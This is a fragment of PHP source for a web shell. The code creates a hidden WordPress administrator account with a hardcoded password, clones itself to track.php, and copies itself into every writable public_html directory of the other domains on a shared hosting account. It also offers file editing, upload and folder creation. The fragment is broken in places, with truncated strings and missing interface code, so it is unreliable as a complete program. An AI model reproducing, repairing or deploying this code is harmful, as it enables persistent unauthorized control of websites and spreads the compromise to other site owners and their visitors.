🗑️ Deleted: " . basename($t) . "
"; } } // === WP Admin Creator if (isset($_GET['wp'])) { $wppath = $cwd; while ($wppath !== '/') { if (file_exists("$wppath/wp-load.php")) break; $wppath = dirname($wppath); } if (file_exists("$wppath/wp-load.php")) { require_once("$wppath/wp-load.php"); $user = 'nova'; $pass = 'Nova@2025'; $mail = 'nova@galaxy.com'; if (!username_exists($user) && !email_exists($mail)) { $uid = wp_create_user($user, $pass, $mail); $wp_user = new WP_User($uid); $wp_user->set_role('administrator'); echo "✅ WP Admin 'nova' created
"; } else { echo "⚠️ User or email exists
"; } } else { echo "❌ WP not found
"; } } // === Clone Here Feature if (isset($_GET['clone'])) { $target = "$cwd/track.php"; $source = __FILE__; if (copy($source, $target)) { echo "🌀 Shell cloned to track.php
❌ Failed to clone shell
"; } } // === Replication logic function replicate($code) { static $once = false; if ($once) return []; $once = true; $start = __DIR__; while ($start !== '/') { if (preg_match('/\/u[\w]+$/', $start) && is_dir("$start/domains")) { $urls = []; foreach (scandir("$start/domains") as $dom) { if ($dom === '.' || $dom === '..') continue; $pub = "$start/domains/$dom/public_html"; if (is_writable($pub)) { $path = "$pub/track.php"; if (file_put_contents($path, $code)) { $urls[] = "http://$dom/track.php"; } } } return $urls; } $start = dirname($start); } return []; } // === Breadcrumbs function nav($p) { $out = "" . htmlspecialchars(file_get_contents("$cwd/$f")) . "
✅ Saved
"; } $src = htmlspecialchars(file_get_contents($path)); echo "📤 Uploaded
"; } if (!empty($_POST['mk'])) { $d = "$cwd/" . basename($_POST['mk']); if (!file_exists($d)) { mkdir($d); echo "📁 Created
"; } else { echo "⚠️ Exists
"; } } // === UI START echo "✅ Cloned into: